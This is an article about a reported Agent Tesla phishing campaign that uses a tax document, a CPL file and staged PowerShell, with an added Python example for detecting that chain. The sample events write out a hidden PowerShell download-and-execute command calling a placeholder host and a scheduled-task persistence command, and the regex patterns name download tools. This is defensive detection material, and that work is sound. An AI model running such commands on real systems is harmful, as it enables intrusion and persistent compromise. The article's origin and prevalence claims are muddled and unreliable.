The Agent Tesla malware has proven to be a significant threat in the world of cybersecurity. This .NET-based Remote Access Trojan (RAT) and data stealer has been in operation since 2014 and has become one of the go-to tools for cybercriminals looking to breach secure organizations.
Recently, researchers at Cyble Research and Intelligence Labs (CRIL) uncovered a new campaign utilizing the Agent Tesla malware. This campaign involves a well-developed process with multiple stages that specifically targets unsuspecting victims using tax-related documents and accompanying control panel files.
The attack begins with a phishing email that tricks the victim into opening a tax document included as an attachment. This tax document contains a CPL file which, when double-clicked, runs PowerShell commands. These commands fetch a further PowerShell script from a predefined URL, and that script in turn downloads and executes the Agent Tesla malware payload.
Agent Tesla is a highly sophisticated information-stealing tool that is primarily focused on stealing credentials and sensitive personal data from compromised systems. It is also capable of stealing clipboard data, gaining file system access, and exfiltrating data to a Command and Control (C&C) server.
The campaign behind the Agent Tesla malware attack follows a sequence of stages, each serving a specific purpose. The initial infection vector involves a malicious attachment masquerading as a regular executable file. Upon execution, the CPL file triggers PowerShell commands that initiate the download and execution of a PowerShell script. This script conceals its true intent until it starts a new process, at which point it reveals the underlying malicious code, which is unpacked into additional PowerShell scripts and executables, including a stealthy .NET-based loader.
Persistence is a key aspect of the Agent Tesla malware’s operation. It utilizes both scheduled tasks and the manipulation of startup folders to ensure that it maintains control over compromised systems. Scheduled tasks perpetuate the execution of malicious scripts, while the startup folder acts as a launchpad for malicious payloads during system initialization. To evade detection, the malware employs a binary string variable called AMSISSISISI, which manipulates Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).
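The chain described above (CPL file launching PowerShell, PowerShell pulling a script from a URL, then scheduled-task and Startup-folder persistence) is the kind of behaviour a defender can flag from process-creation and file-creation telemetry. The following is an added detection example, not code from the CRIL report; the event records are constructed in a Sysmon-like shape and the rule names are hypothetical.

```python
import re

# Constructed sample events (Sysmon-like: eid 1 = process create, eid 11 = file
# create). These are made up for the example, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"eid": 1, "rec": 1, "parent": r"C:\Windows\System32\control.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32.exe Shell32.dll,Control_RunDLL "C:\Users\u\Downloads\TaxForm.cpl"'},
    {"eid": 1, "rec": 2, "parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"eid": 1, "rec": 3, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /sc minute /mo 10 /tn Updater /tr "powershell -w hidden -File C:\Users\u\AppData\Local\u.ps1"'},
    {"eid": 11, "rec": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.exe"},
    {"eid": 1, "rec": 5, "parent": r"C:\Windows\explorer.exe",   # benign interactive use, must not fire
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-ChildItem C:\\"},
]

# control.exe hosts .cpl files and hands them to rundll32.exe; PowerShell under either is unusual.
CPL_HOSTS = ("control.exe", "rundll32.exe")
SUSPICIOUS_PS_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|-encodedcommand|-enc\b|\s-e\s", re.I)
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the list of (hypothetical) rule names this single event trips; empty if none."""
    hits = []
    if ev["eid"] == 1:
        img, par, cmd = basename(ev["image"]), basename(ev.get("parent", "")), ev["cmd"].lower()
        if img == "powershell.exe" and par in CPL_HOSTS:
            hits.append("powershell_spawned_by_cpl_host")
        if img == "powershell.exe" and SUSPICIOUS_PS_RE.search(cmd):
            hits.append("suspicious_powershell_cmdline")
        if img == "schtasks.exe" and "/create" in cmd and "powershell" in cmd:
            hits.append("schtask_runs_powershell")
    elif ev["eid"] == 11 and STARTUP_RE.search(ev["target"]):
        hits.append("startup_folder_drop")
    return hits

def triage(events):
    """Map record number -> tripped rules, keeping only events that fired at least one rule."""
    findings = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            findings[ev["rec"]] = hits
    return findings
```

Correlating the hits by process lineage (the powershell.exe record that fired also parents the schtasks.exe record) is what turns individual alerts into a single incident matching this chain.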
The origins of Agent Tesla can be traced back to the Quantum Builder software, which enables cybercriminals to create malicious LNK files. These LNK files play a crucial role in the malware’s attacks, facilitating credential harvesting, payload execution, and initial system access. Agent Tesla gained prominence in the 2020s for exploiting COVID-19 PPE-themed phishing schemes, using emails containing harmful file attachments and malicious Microsoft Office documents.
In terms of its prevalence, Agent Tesla ranked as the 6th most common malware in 2021, affecting 4.1% of business networks. It experienced a 50% decline in global infostealer malware prevalence between 2020 and 2021, second only to Formbook.
As with any report, it is important to note that the information provided is for reference purposes and users bear full responsibility for their reliance on it. The Cyble Research and Intelligence Labs assume no liability for the accuracy or consequences of using this information.
Overall, the Agent Tesla malware continues to pose a significant threat to organizations worldwide. Its evolving tactics and ability to adapt make it a formidable adversary in the realm of cybersecurity. Organizations must stay vigilant and take proactive measures to protect themselves against this dangerous malware.